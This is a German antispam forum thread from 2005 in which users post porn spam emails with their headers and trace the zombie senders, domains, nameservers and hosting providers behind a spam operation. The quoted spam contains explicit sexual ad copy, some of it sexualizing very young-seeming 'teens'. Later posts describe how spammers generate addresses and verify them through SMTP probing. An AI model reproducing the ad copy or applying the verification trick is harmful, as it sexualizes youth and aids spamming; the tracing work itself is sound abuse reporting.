Subject: =?ISO-8859-1?B?SmVkZXIgQmVzdWNoZXIgZXJo5Gx0IDMga29zdGVubG9zZSBUZWVudmlkZW9z?=
Message-ID: [ID filtered]
Sender: root [at] cydb00.cyberservices.tv



Du stehst auf blutjunge Girlies mit samtweicher Haut, zarten Pflaumen und kleinen Teenie-Titten? Du willst schnell und einfach an Zugangsdaten kommen? Du willst nicht viel dafür bezahlen? Deine Wünsche wurden soeben erhört und sind uns sozusagen ein Befehl. Schau Dir erstmal die 3 kostenlosen Videos an.


http://www.nackteteens.com/?MID=10206&WMID=1&ml=2


Möchtest Du dann alles sehen, brauchst Du Dir keine Dialersoftware zu installieren und Deine persönlichen Daten und Bank oder Kreditkarten-Daten wollen wir auch nicht wissen. Du brauchst lediglich ein Mobiltelefon, Dein Handy!!!

Du zahlst, absolut anonym, per SMS, den Preis von lediglich 4,99 Euro und siehst dafür junge Gören die es das erste Mal so richtig besorgt bekommen, anal entjungfert werden oder lernen, einen Schwanz richtig zu blasen

Versaute Teens (18+), blutjung und richtig verdorben und alles nur für diesen absoluten Knüllerpreis von 4,99 € kriegst du ausschließlich hier:




Wenn Du diesen Newsletter nicht mehr erhalten möchtest, klicke einfach auf
diesen Link:
http://www.memberarea.tv/nl.php?

Bernd_E
19.10.2005, 19:28
Received: from amateur-ejacs.cc ([81.31.45.2])
by winfaktenigate ([192.168.0.3], envelope-sender=<mandy [at] amateur-ejacs.cc>)
with No Spam Today! Service V2.3.2.2 Freeware
for 192.168.0.2; Wed, 19 Oct 2005 xx:xx:xx +0200
Received: from 10.0.10.33
by amateur-ejacs.cc with asmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Wed, 19 Oct 2005 xx:xx:xx +0200
Message-ID: [ID filtered]
Subject: =?iso-8859-1?Q?Nun_sieh_mal_an_was_die_da_dr=FCben_treiben...?=
Date: Wed, 19 Oct 2005 xx:xx:xx +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To: poor [at] spamvictim.tld
From: "Mandy" <mandy [at] amateur-ejacs.cc>
Nicht heimlich durch die Hecke spähen sondern mal direkt Einblicke erhalten
wenn Müller, Meier und Schulze es mal wieder sexy auf die Spitze treiben.
Hier sehen, wie es die Nachbarn treiben und wie versaut und geil es unter
deutschen Dächern so abgeht. Diese Einblicke sind absolut einzigartig und
nur hier zu kriegen. Nutze also direkt deine frivole Chance auf intime
Geheimnisse und Sex pur.

h**p://www.amateur-ejacs.cc/?ml=1&MID=10041929&WMID=67623&Spon=bienchoi

In den eigenen vier Wänden scheint es für diese Luder und ihre Stecher keine
Hemmungen zu geben. Jedes Loch wird geil gestopft und kein Tropfen Sperma,
daß nicht von gierigen Münder abgesaugt wird. Extrem pervers, extrem scharf
und extrem geil, was hier so abgeht. Nicht vergessen... es könnte nebenan
bei dir sein. Veilleicht ist sogar deine scharfe Nachbarin von gegenüber mit
am Start und lässt sich scharf flach legen. Sei live dabei, wenn es geil zur
Sache geht.

h**p://www.amateur-ejacs.cc/?ml=1&MID=10041929&WMID=67623&Spon=bienchoi

Wenn Du diesen Newsletter nicht mehr erhalten möchtest, klicke einfach auf
diesen Link:

h**p://www.amateur-ejacs.cc/a.php?adr=markus.larsen [at] winfakten.de

UM5232629

Investi
23.10.2005, 21:09
Ist der Cyberservices-Anwalt aus Hamburg nicht mehr gut genug als Admin-c? Die Domain http://www.latex.de zumindest hat einen neuen Ansprechpartner für die Denic.

gation
23.10.2005, 23:15
Dieser Herr aus der von Investi geposteten whois taucht bei mir als Inhaber einer Domain (link-->whois) (http://www.antispam-ev.de/~phil/spamlink/?url=http://www.moesen.de) auf. Ich habe mich da mal gewundert, weil (soweit ich das lesen kann, hier gibt's da wohl bessere Experten) die WMID=1 übertragen wird. Fand ich ungewöhnlich...

(gerade eben bekam ich auf moe*en zB ein popup
http://www.smg*ys.cc/popupdialer.php?WMID=1&PGID=83&LID=22621[...])

Investi
23.10.2005, 23:35
Dann sind bereits zwei der 43 mir bekannten .de-Domains von Cyberservices auf diesen Herrn eingetragen.

BTW: das Öffnen des Popups von der Seite moe.en.de dürfte ja hart am Rande der Legalität sein. Aber die Verlinkung zu der beworbenen Seite stellt eindeutig eine Straftat dar, oder wie war das mit dem Jugendschutz?

kjz1
27.10.2005, 20:39
Heute wieder frisch von das Altm... eingetroffen:

Domain Name:SPASS2005.INFO ---> 221.4.179.234 --->
CNCGROUP-GD

Und heute wieder:

versendet vom Zombie: 71.12.207.178 ---> unknown.mgy.al.charter.com

beworben wird: RATTENSCHARF. INFO ---> 222.47.183.212 ---> CRTC, also wieder bei den chines. Eisenbahnern (da machen anscheinend einige unterbezahlte IT-Mitarbeiter mit Spam-Hosting ein 'hübsches Nebengeschäft')

mit dem DNS:

Name Server: DNS1.BIPPY.INFO ---> 61.235.117.166 ---> CRGdSzS/CRTC
Name Server: DNS2.BIPPY.INFO ---> 222.47.183.213 ---> CRTC
Name Server: DNS4.BIPPY.INFO ---> 61.235.117.168 ---> CRGdSzS/CRTC

interessant der Spamhaus-Eintrag:
-----
61.235.117.128/25 is listed on the Spamhaus Block List (SBL)

2005-10-23 activated *again*

soniclender.com. 86395 IN A 61.235.117.161
soniclender.com. 160462 IN NS dns1.logabc.com.
soniclender.com. 160462 IN NS dns2.logabc.com.
dns1.logabc.com. 26706 IN A 61.235.117.161
dns2.logabc.com. 156844 IN A 61.235.117.161

2005-10-10 activated

spass2005.info. 594 IN A 61.235.117.167
spass2005.info. 594 IN NS ns1.unidan.info.
spass2005.info. 594 IN NS ns2.unidan.info.
spass2005.info. 594 IN NS ns3.unidan.info.
spass2005.info. 594 IN NS ns4.unidan.info.
ns1.unidan.info. 66562 IN A 61.235.117.167
ns2.unidan.info. 66562 IN A 61.235.117.169
ns3.unidan.info. 66562 IN A 221.4.181.74
ns4.unidan.info. 66562 IN A 221.4.181.75
-----

Die Spass-Domain des 'Cyberservices-Spammer' war auf diesen IPs schon einmal gehostet, nachdem eNom die Domain 'gekillt' hatte, legt Spammy dort wieder einen seiner Nameserver an.

- kjz

Goofy
27.10.2005, 21:00
TLD2.ULTRADNS.NET. [204.74.113.1]: Reports that no A records exist. [took 7 ms]

Answer:
No A records exist for SPASS2005.INFO.

kjz1
28.10.2005, 19:21
No A records exist for SPASS2005.INFO.

Ja, die Domain ist schon länger tot. Was mich bei diesen Dummspammern immer wieder ärgert, ist die 'Porno-Prosa'. Wie blöd muss man selbst sein, um so einen Mist zu verzapfen? Oder hält man die (potentielle) Kundschaft für genauso blöd, wie man selber ist?

Ausserdem wundert mich, dass Spammy kaum einen anständigen deutschen Satz zusammenbekommt, aber wie man Adressen sammelt, über Botnetze spammt, China-Server anmietet, dDOS-Angriffe fährt, das wissen die Gesellen...

- kjz

kjz1
31.10.2005, 14:24
Heute wieder eingetroffen:

abgekippt über einen Zombie bei einer kaliforn. Schule:

207.213.64.9 ---> do-9.porterville.k12.ca.us

beworben wurde:

http://www. ru4mailnow. com/sk ---> 61.132.74.66 ---> CHINANET-JS

mit dem Nameserver: ns1.hbdns.biz ---> 61.132.74.66, also wieder bei den merkbefreiten Chinesen.

Wie üblich aber nur wieder ein Redirect zu:

http://www. sexkontakte. cc ---> 62.129.136.193 ---> Cyberservices BV, NL/Virtualxs.com

und

http://www. sexmoney. com ---> 217.173.159.11 ---> TITAN-CYBER/Titan Networks

Beide mit der WMID=66163 und natürlich wieder bei unseren 'Freunden' von Cyberservices und Titan Networks. Interessant, was auf den beiden IPs sonst noch so kreucht und fleucht:

62.129.136.193 - IP hosts 22 Total Domains ...
Showing 1 - 22 out of 22

Domain Name
1 ASTROLOGIE-GUIDE.COM.
2 ENDLICHGELD.COM.
3 ERFOLGBEIFRAUEN.COM.
4 ERFOLGIMBERUF.COM.
5 FATSTRIP.COM.
6 HOROSKOPPORTAL.COM.
7 INTELLIGENZ-CHECK.COM.
8 IQ-ANALYSE.COM.
9 JOEPORNSTAR.COM.
10 KEKILLI-NACKT.COM.
11 KEKILLI-NAKT.COM.
12 KEKILLI-PORNO.COM.
13 NASTYCASTING.COM.
14 PARTNERSCHAFTSTEST.COM.
15 PARTNERSCHAFTSTESTS.COM.
16 SIBEL-KEKILLI.COM.
17 SIBEL-NACKT.COM.
18 SIBEL-NAKT.COM.
19 SIBEL-PORNO.COM.
20 TEENEDEN.COM.
21 TXT2MATCH.COM.
22 VULVARATED.COM.


217.173.159.11 - IP hosts 4 Total Domains ...
Showing 1 - 4 out of 4

Domain Name
1 SEXMONEY.BIZ.
2 SEXMONEY.COM.
3 SEXMONEY.ORG.
4 WEBMASTERCHANNEL.COM.


- kjz

Bernd_E
01.11.2005, 18:05
Received: from newmail.tv ([81.31.41.2])
by winfaktenigate ([192.168.0.3], envelope-sender=<manuela [at] newmail.tv>)
with No Spam Today! Service V2.3.3.2 Freeware
for 192.168.0.2; Tue, 01 Nov 2005 xx:xx:xx +0100
Received: from 10.0.2.3
by newmail.tv with asmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Mon, 31 Oct 2005 xx:xx:xx +0100
Message-ID: [ID filtered]
Subject: Sonne, Strand und sexy Luder
Date: Mon, 31 Oct 2005 xx:xx:xx +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To: poor [at] spamvictim.tld
From: "Manu" <manuela [at] newmail.tv>
Ab in den Flieger und raus aus dem grauen Deutschland in die südliche Sonne
von Mallorca. Viele Girls sind das erste Mal alleine im Urlaub und wollen
nur Spaß und Party. Sex gehört natürlich auch dazu und so machen diese
versauten Luder wirklich alles mit, selbst wenn man mit der plattesten
Anmache kommt.

Sei dabei, wenn am Pool heiß gefingert und gefickt wird, oder in den Dünen
Sexspielchen par excellence zelebriert werden. Teengirls ohne Hemmungen sind
am Start und machen auch Dich garantiert richtig scharf. Lecken und
lutschen, ****** und vögeln und das rund um die Uhr für Dich jetzt im Netz.
h**p://www.newmail.tv/?ml=1&MID=10042004&WMID=61935&Spon=optgrp

Wenn Du diesen Newsletter nicht mehr erhalten möchtest, kannst du dich hier
austragen:
h**p://www.newmail.tv/a.php?adr=xyz [at] winfakten.de

UM5232629
Die Links sind Weiterleitungen zu mallorcateen.com (http://www.dnsstuff.com/tools/whois.ch?ip=mallorcateen.com)

Bernd_E
02.11.2005, 20:22
Received: from amateur-ejacs.cc ([81.31.45.2])
by winfaktenigate ([192.168.0.3], envelope-sender=<mandy [at] amateur-ejacs.cc>)
with No Spam Today! Service V2.3.3.2 Freeware
for 192.168.0.2; Wed, 02 Nov 2005 xx:xx:xx +0100
Received: from 10.0.10.33
by amateur-ejacs.cc with asmtp (Exim)
ID: [ID filtered]
for poor [at] spamvictim.tld; Tue, 01 Nov 2005 xx:xx:xx +0100
Message-ID: [ID filtered]
Subject: Sofort geil - sofort scharf - sofort Sex
Date: Tue, 1 Nov 2005 xx:xx:xx +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
To: poor [at] spamvictim.tld
From: "Mandy" <mandy [at] amateur-ejacs.cc>
Wenn du keine Lust auf langatmiges Vorspiel hast und sofort puren und
unverfälscht geilen Sex erleben willst, dann bis Du hier absolut richtig.
Hier erlebst du Videos, die richtig geil zur Sache gehen und zwar ab der
ersten Sekunde ist hier Vollgas. Liveshows ohne langes Vorgeplänkel und
Bilder die absolut alles zeigen.

Ein wirklich riesiges und umfassendes Erotikprogramm wartet nur auf Dich,
also zögere jetzt nicht noch länger und melde Dich gleich an. Sexy Girls,
erotische Stellungen und noch viel mehr extrem scharfes Material erwartet
Dich hier. Gleich anmelden und rein schauen - geiler kriegst du es sowieso
nirgendwo.
h**p://www.amateur-ejacs.cc/?ml=1&MID=10042012&WMID=67623&Spon=bienchoi

Nicht das dabei was dich scharf macht? Warte ab, denn schon bald kommt ein
neues, super-scharfes Angebot. Trotzdem aus dem Newsletter austragen?
h**p://www.amateur-ejacs.cc/a.php?adr=xyz [at] winfakten.de

UM5232629

kjz1
08.11.2005, 21:09
Die Porno-M.... von Cyberservices war mal wieder international unterwegs:

eingeworfen in Spanien bei: 213.4.149.69 ---> 69.host.terra.es

beworben wird:

ru4mailnow. com ---> 61.132.75.126 ---> CHINANET-JS (China)

mit dem Nameserver ns1.hbdns.biz auf selbiger IP. Ist aber nur ein Redirect auf:

www. sexkontakte. cc mit WMID=66163 ---> 62.129.136.193 ---> s01.cyberservices.nl/VirtualXS Internet

Womit wir bei Cyberservices in NL wären, gehostet bei VirtualXS. Auf dieser IP laufen noch so bekannte Seiten (alte Bekannte?) wie:

www. gay-club.cc A 62.129.136.193
www. fistingworld.cc A 62.129.136.193
www. sexkontakte.cc A 62.129.136.193
www. squirting.cc A 62.129.136.193
www. nastycasting.cc A 62.129.136.193
www. balloon-fetish.cc A 62.129.136.193
www. hairy-fuck.cc A 62.129.136.193
bdsm-geschichten-kostenlos.bdsm-dungeon.cc A 62.129.136.193
bdsmdungeon.cc A 62.129.136.193
www. groupsexaction.cc A 62.129.136.193
www. extreme-voyeur.cc A 62.129.136.193
www. extremevoyeur.cc A 62.129.136.193
www. hugepenis.cc A 62.129.136.193
abspritzen. analcams.cc A 62.129.136.193
www. cum-lovers.cc A 62.129.136.193
www. cumlovers.cc A 62.129.136.193
www. teen-report.cc A 62.129.136.193
www. teenreport.cc A 62.129.136.193
www. i-sex.cc A 62.129.136.193
www. femdom-sex.cc A 62.129.136.193
femdomsex.cc A 62.129.136.193
www. femdomsex.cc A 62.129.136.193
www. teensex.co.uk A 62.129.136.193
193.136.129.62.in-addr.arpa PTR s01.cyberservices.nl
www. joepornstar.com A 62.129.136.193
www. latinporn.tv A 62.129.136.193
www. latinaporno.tv A 62.129.136.193
seitenspringer.tv A 62.129.136.193
www. seitenspringer.tv A 62.129.136.193
www. asia-queens.tv A 62.129.136.193
www. ibizasex.tv A 62.129.136.193

sexkontakte.cc ist zugelassen auf Cyberservices in Kingston (Karibik), Cyberservices.nl wieder auf eine Adresse in Amsterdam. Aber auch von hier geht's noch einmal per Redirect weiter auf:

www1. cybilling. com ---> 217.173.158.7 ---> cyweb04. cyberservices.tv

wieder mit WMID=66163, diesmal also Cyberservices.tv und Cybilling. Und was findet man im Whois von Cybilling ---> Maintainer: Titan Networks GmbH. Ah ja, womit mal wieder alle beisammen wären.... Fehlt noch jemand?

- kjz

schara56
09.11.2005, 00:24
From vwxnj [at] mail2abc.com Tue Nov 8 xx:xx:xx 2005
Return-Path: <vwxnj [at] mail2abc.com>
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: from xxx [at] xxx.xx [82.149.228.140]
by localhost with POP3 (fetchmail-6.2.5.2)
for poor [at] spamvictim.tld (single-drop); Tue, 08 Nov 2005 xx:xx:xx +0100 (CET)
Received: from 82.149.228.140 ([218.208.110.218])
by xxx (8.12.10/8.12.10) with SMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Tue, 8 Nov 2005 xx:xx:xx +0100
Received: (@.kvack.org) by kvack.org ID: [ID filtered]
Tue, 08 Nov 2005 xx:xx:xx -0300
Date: Tue, 08 Nov 2005 xx:xx:xx -0600
From: "Lesbo News" <vwxnj [at] mail2abc.com>
To: poor [at] spamvictim.tld
Subject: Sonderangebot
Message-ID: [ID filtered]
X-MailScanner: Found to be clean
X-MailScanner-From: vwxnj [at] mail2abc.com
X-Collected-By: GMX/xxx
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 0 (Mail was not recognized as spam)
X-GMX-UID: [UID filtered]

--- Weitergeleitete Nachricht ---
Von: "Lesbo News" <vwxnj [at] mail2abc.com>
An: xxx [at] xxx.xx
Betreff: Sonderangebot
Datum: Tue, 08 Nov 2005 xx:xx:xx -0600


SIE LASSEN SICH EINFACH ANSPRECHEN UND ZoeGERN NICHT
LANGE MIT ZU GEHEN WENN ES DARUM GEHT DURCHGEFIIICKT
ZU WERDEN. DENN FRAUEN WISSEN WAS FRAUEN WOLLEN!!!

http://www.herbstlinks.info/lesbentest/

Wie du traeumen viele Maenner davon mal hautnah
dabei zu sein wenn zwei oder mehr Frauen es sich
besorgen.
Sei dabei und schau zu wenn sie sich geil gegenseitig
lecken und sich mit ihren Dildos gegenseitig verwoehnen.
Erlebe wie es zugeht wenn es heisst "Frau mit Frau"

http://www.herbstlinks.info/lesbentest/

****************************************************


Es gab einige Problem mit dem austragen. Bitte machen sie
Dies erneut. Eine Austragung erfolgt dann auch!!!

http://www.herbstlinks.info/out.php

Abgekippt über 218.208.110.218 -> TMNET, TELEKOM MALAYSIA BERHAD -> abuse[at]tm.net.my

BNutzer
09.11.2005, 14:03
vielleicht renne ich offene türen ein, aber es ist m.e. sehr empfehlenswert, auf
http://www.rulesemporium.com/cgi-bin/uribl.cgi
zu überprüfen, ob die beworbenen domains dort schon gelistet sind und sie ggf. zu melden.

dann würden sie von spamassassin erkannt und mit punkten bestraft.

auf www.uribl.com muss man sich anmelden, um mails posten zu können.

kjz1
10.11.2005, 10:44
Heute wieder eingetroffen, zur Absicherung der Gewinne läuft die Abzocke diesmal wieder über die Gebrüder P. in Stockern:

Zombie: 169.232.192.141 (University of California)

beworben wird: FREUNDETREFFEN. INFO ---> 218.65.209.24 ---> CHINANET-GX
mit den Nameservern:

DNS1.BIPPY.INFO ---> 218.65.209.24 ---> CHINANET-GX
DNS2.BIPPY.INFO ---> 221.11.134.43 ---> CNCGROUP-HI
DNS4.BIPPY.INFO ---> 218.65.209.26 ---> CHINANET-GX
BIPPY.INFO ---> 221.11.134.43

da läuft dann noch:

jscepitech.com A 218.65.209.24
www.jscepitech.com CNAME jscepitech.com
sweetsitesonline.info A 218.65.209.24
freundetreffen.info A 218.65.209.24
www.freundetreffen.info CNAME freundetreffen.info
herbstlinks.info A 218.65.209.24
www.herbstlinks.info CNAME herbstlinks.info
thosemonns.info A 218.65.209.24
dns1.bippy.info A 218.65.209.24
dns4.bippy.info A 218.65.209.24

Laut Spamcop hängt bei einer IP auch Leo wieder mit drin:

221.11.134.42/31 is listed on the Register Of Known Spam Operations (ROKSO) database as being assigned to, under the control of, or providing service to a known professional spam operation run by Leo Kuvayev / BadCow.

Sind natürlich nur alles wieder Redirects zu:

digitalpayment. de/paygate/useremail.php
member.sofortficken. com/?wm=4130&ag=141&lg=de&py=13&sc=1&dp=1&st=2&dl=1&dt=1&file=eingang.php&do=65"

Wie gesagt, mit WMID=4130 bei den einschlägig bekannten Gebrüdern in Österreich.

- kjz

sis
10.11.2005, 15:54
Was mich sehr wundert, sind die im heute bei mir aufgeschlagenen Müll gleichen Inhalts namentlich penibel sortierten Web.de Adressen im CC-Feld. Die acht Adressen unterscheiden sich erst ab dem 4.Buchstaben. Entweder sind das reine Fake-Adressen (bis auf meine eigene natürlich), oder systematisch gekaufte Web.de-Adressen.

kjz1
10.11.2005, 16:15
Wenn mich mein Gedächtnis nicht täuscht, war das beim Cyberservices-Spammer schon immer so. Auch hier: Web.de Adressen, sauber sortiert. Und der Mailserver von Web.de nimmt auch Mail für diese Adressen an (Status: 250), die scheinen also zu stimmen.

Ich hatte diese Adresse vor Urzeiten mal eingerichtet, aber nie aktiv benutzt. Darauf kommt auch absolut keine andere Mail, nur der Cyverservices-Spam. Irgendwie nährt das doch den Verdacht, dass Web.de Adressen verkauft hat bzw. der Spammer aus 'offiziösen' Quellen diese Adresse von Web.de erhalten hat.

- kjz

sis
10.11.2005, 16:44
Irgendwie nährt das doch den Verdacht, dass Web.de Adressen verkauft hat bzw. der Spammer aus 'offiziösen' Quellen diese Adresse von Web.de erhalten hat.Web.de (im United-Internet Verbund mit GMX, Schlund+Partner und 1&1) würde eigene eMail-Adressen niemals offiziell herausgeben/verkaufen (das wäre absolut fatal für einen deutschen ISP). Aber ich kann mir vorstellen, dass jemand mit Zugriff auf die entsprechende Datenbank bei verlockendem Angebot "weich geworden sein könnte" o.ä.

Das ist aber - wie schon oft in diesem Forum geäussert - reine Spekulation.

350x2
11.11.2005, 21:55
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 11 Nov 2005 -0000
Received: from gb.jb.68.119.revip.asianet.co.th (HELO gb.jb.68.119.revip.asianet.co.th) [61.91.68.119]
by mx0.gmx.net (mx007) with SMTP; 11 Nov 2005 +0100
Received: from nicety.debian.org [82.116.223.128]
by copperhead.debian.org with esmtp (Exim 3.12 1 (Debian))
ID: [ID filtered]
Date: Fri, 11 Nov 2005 -0400
Message-ID: [ID filtered]
From: "Wuensche" <@mail2israel.com>
To: poor [at] spamvictim.tld
Cc:
Subject: Nachricht für Dich
X-Mailer: Mulberry/2.1.0a3 (Win32 Demo)
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 0 (Mail was not recognized as spam)
X-GMX-UID: [UID filtered]


Hier findet jeder etwas!
Zugang mit dem Handy - schnell und ohne Bankdaten!!

Also als ich selber das erste Mal nach Sexkontakten
im Internet gesucht habe war ich selber enttaeuscht.
Viele Fakes und und und...aber das gibt es hier so
gut wie gar nicht.
www[at]herbstlinks.info/sofortkontakte/

Ich h=E4tte mir schon den Pimmel wundf*cken
koennen. Tausende Singles, Paare - egal ob alt oder
jung,normal oder mit speziellen Vorlieben - einfach
nur GEIL!

Zugang sofort uebers Handy!!! Keine Bankdaten erforderlich!!

Also sei herzlich eingeladen - wir warten auf Dich ;-)


[at]herbstlinks.info/sofortkontakte

****************************************************

Es gab einige Problem mit dem austragen. Bitte machen sie
Dies erneut. Eine Austragung erfolgt dann auch!!!
www[at]herbstlinks.info/out.php
-------------------------------------------

Und wo kann ich den mist abmelden oder weiterleiten,
hier kenn ich mich nicht aus??????:eek:

hilflos 350x2

schnippi
12.11.2005, 15:16
Es gibt Programme, mit denen generiert man 100 Milliarden verschiedene Web.de Adressen mit allen Namen und begriffen. Das dauert mit einem modernen PC einen Tag. Ein Mailprogramm zum erforschen, ob die Mails okay sind schafft 80000 pro Minute.

10 Computer mit SDSL schaffen knapp 70 Milliarden Adressen an einem Tag. Dann bleiben halt bei web.de 0,01 Prozent (7 Millionen) funktionierende Mailadressen übrig. Da braucht man Web.de nicht zu verdächtigen, dass die Adressen an Spammer verkaufen zumal solche geprüften generierten Adressen sogar bei Ebay Italien verkauft werden.

Diese 7 Millionen Adressen schreiben die doch auch in einer Stunde an wenn sie wollen. Web.de hat nichts damit zu tun!

kjz1
20.11.2005, 16:38
Heute wieder eingetroffen:

Zombie: user-12lcjcb.cable.mindspring.com [69.86.77.139]

beworben wurde: portal. neverendingstory. cc

---> 81.31.45.9 ---> VIAKOM, CZ

super.anythingforyou.cc A 81.31.45.9
mallorca.neverendingstory.cc A 81.31.45.9
portal.neverendingstory.cc A 81.31.45.9
ps.neverendingstory.cc A 81.31.45.9
9.45.31.81.sbl.spamhaus.org A 127.0.0.2
9.45.31.81.sbl-xbl.spamhaus.org A 127.0.0.2
9.45.31.81.zz.countries.nerd.dk A 127.0.0.203

also auf den Blocklisten schon einschlägig vertreten. Spamhaus meint dazu:

Ref: SBL32111

81.31.45.9/32 is listed on the Spamhaus Block List (SBL)

18-Sep-2005 18:08 GMT | SR09

anythingforyou.cc

TCP stream analysis of a virus-infected/trojaned PC reveals that it is
being hijacked on proprietary high ports from the spammers illegal
proxy-mailing server at 213.158.102.34.

Alles aber nur Redirects auf versch. Pornoseiten mit der WMID=69350.
Letztendlich geht's zum Abzockserver:

www2. cybilling. com/anmeldung/lz_anmelden.php?WMID=69350&PGID=78&LID=49002&WMEC=0...
---> 217.173.158.21 ---> TITAN-CYBER-A

Und da haben wir wieder unsere altbekannten 'Freunde' von Titan Networks.

- kjz

werbemail
20.11.2005, 20:52
Es gibt Programme, mit denen generiert man 100 Milliarden verschiedene Web.de Adressen mit allen Namen und begriffen.

siehe:
Ein Link zu solchen Seiten erhöht deren Rating in Suchmaschinen. Ist nicht unbedingt hilfreich im Kampf gegen Spam. Investi

Produkt:
Email Address Extractor


Vielleicht sollte man sich nicht soviel Mühe machen um den Spammer zu kriegen, vielleicht sollte man den Verkauf solcher Programme verbieten. Ich denke dann hat es der eine oder andere Spammer nicht mehr so einfach oder er kann sich das Zeugs selber programmieren ;-)

sis
21.11.2005, 00:02
Siehe mein Posting hier im Forum (http://www.antispam-ev.de/forum/showpost.php?p=48202&postcount=4). Traurig, aber wahr.

werbemail
21.11.2005, 02:22
klar ist das traurig aber wie willste das denn sonst lösen?

soll denen ihr server alle emails annehmen?
stell dir vor der spammer schickt ne millionen emails an einen server und die kiste nimmt alle emails an. jetzt gehen aber nur eine handvoll emails davon. was machste dann mit den anderen emails? und wer zahlt den traffic, etc.

der server muss schon vorher sagen das er die mail nicht will. ich sehe da keine andere möglichkeit.

als gute alternative finde ich diese spamfilter wo du als sender eine email retout erhälst und auf eine webseite gebeten wirst um den text auf einem bild in ein feld einzugeben. erst danach wird deine email an den empfänger weitergeleitet.

der sender muss es auch nur ein einziges mal machen und nicht bei jeder email ;-)

so ist sichergestellt das es sich um einen menschen und nicht um einen bot handelt der massenversendungen erledigt.

und niemand wird sich die mühe machen wenn er eine millionen mails verschickt hat dann auch eine millionen mal den text in das feld übertragen.

:D

das wäre mit sicherheit der tod für alle spammer :skull:

sis
21.11.2005, 13:32
Ich bin doch auf einer ganz anderen Baustelle :)

Bei WEB.DE kann man Adressen verifizieren, ohne auch nur den Ansatz einer eMail zu schreiben (naja, den Absender halt). Ich behaupte in der SMTP-Session einfach, der Eigentümer der zu verifizierenden Adresse zu sein (SMTP-Kommando "mail from: "). Sollte mein scheinbarer Account nicht existieren, dann gibt mir WEB.DE fein säuberlich eine Fehlermeldung zurück. Und wenn mein "Account" existiert, dann bekomme ich das auch gesagt.

Ich kann mir nicht vorstellen, dass Spammer-Verifikations-Software einen anderen Ansatz wählt (einfach eMails an unbekannte Adressaten zu verschicken, erfordert wesentlich mehr Bandbreite und eine heftige Nacharbeit bei den Bounces).

Bei T-Online-Adressen, die nur über den eigenen T-Online Account abgerufen werden können, funktioniert das natürlich nicht. Aber dafür genauso auch bei GMX.DE und sicherlich vielen anderen ISPs.

Cape Town
21.11.2005, 18:34
Ich kann mir nicht vorstellen, dass Spammer-Verifikations-Software einen anderen Ansatz wählt (einfach eMails an unbekannte Adressaten zu verschicken, erfordert wesentlich mehr Bandbreite und eine heftige Nacharbeit bei den Bounces).
Ich glaube nicht, daß einem Spammer die Bandbreite der beanspruchten Provider wichtig ist. Für den ist doch das email-Postfach bzw. der Webzugang nach dem Versand der Mails wurscht.

Cape Town

corlis
21.11.2005, 18:59
Ich glaube nicht, daß einem Spammer die Bandbreite der beanspruchten Provider wichtig ist. Für den ist doch das email-Postfach bzw. der Webzugang nach dem Versand der Mails wurscht.

Cape Town

Die Verifizierungsmethode, wie sie sis erläuterte, benötigt nur wenige bytes für den Spammer, während die andere Methode wesentlich mehr an traffic für den Spammer bedeutet - mit dem zusätzlichen Problem das die versendete Mail und den daraus resultierenden Daemon abgeglichen werden müssen, was bei Massenmails einen erheblichen, datenbankintensiven Aufwand bedeutet. Mit sis' Methode haben spammer aber die Möglichkeit, in relativ kurzer Zeit einen aktuellen Datenbestand von web.de zu erhalten - und benötigen so weniger eigene Ressourcen, um spammails an web.de-adressen zu senden.

Cape Town
21.11.2005, 19:04
Soweit akzeptiert. Aber ich verstehe nicht, weshalb das für den Spammer so wichtig sein sollte. Immerhin bedeutet doch die von sis beschriebene Abfragemethode auch ein Risiko der Entdeckung. Ich kann mir nicht vorstellen, daß die von den Freemaildiensten verwendete Software hier keine Warnfunktionen eingebaut hat. Es handelt sich ja hier nicht um 20 oder 50 Abfragen, die zu Fehlermeldungen dereinen oder anderen Art führen, sondern um zig-Tausende.

werbemail
21.11.2005, 20:29
Es handelt sich ja hier nicht um 20 oder 50 Abfragen, die zu Fehlermeldungen dereinen oder anderen Art führen, sondern um zig-Tausende.
Leider hat Web.de ja auch tausende User. Das einzige was Du machen kannst ist Anfragen von der gleichen IP blocken, was aber für Spammer mitlerweile auch kein Problem mehr ist. Aber das sollten die eigentlich integrieren. Sorry für mein Falschpost gestern. Hatte was missverstanden.

kjz1
22.11.2005, 10:32
Cyberservices Spam kommt mit einigem Abstand bei mir immer im Doppelpack. Heute:

Zombie: host86-137-52-249.range86-137.btcentralplus.com

Beworben wurde:

HERBSTLINKS.INFO ---> 218.65.209.24 ---> CHINANET-GX

mit DNS:

Name Server: DNS1.BIPPY.INFO ---> 218.65.209.24 ---> CHINANET-GX
Name Server: DNS2.BIPPY.INFO ---> 221.11.134.43 ---> CNCGROUP-HI
Name Server: DNS4.BIPPY.INFO ---> 218.65.209.26
Name Server: DNS3.BIPPY.INFO ---> 221.11.134.43

auf den Servern läuft sonst noch so:

24.209.65.218.sbl-xbl.spamhaus.org A 127.0.0.2
jscepitech.com A 218.65.209.24
www.jscepitech.com CNAME jscepitech.com
somefreesites.com A 218.65.209.24
sitesonlygood.info A 218.65.209.24
sweetsitesonline.info A 218.65.209.24
freundetreffen.info A 218.65.209.24
www.freundetreffen.info CNAME freundetreffen.info
royaltobacco.info A 218.65.209.24
herbstlinks.info A 218.65.209.24
www.herbstlinks.info CNAME herbstlinks.info
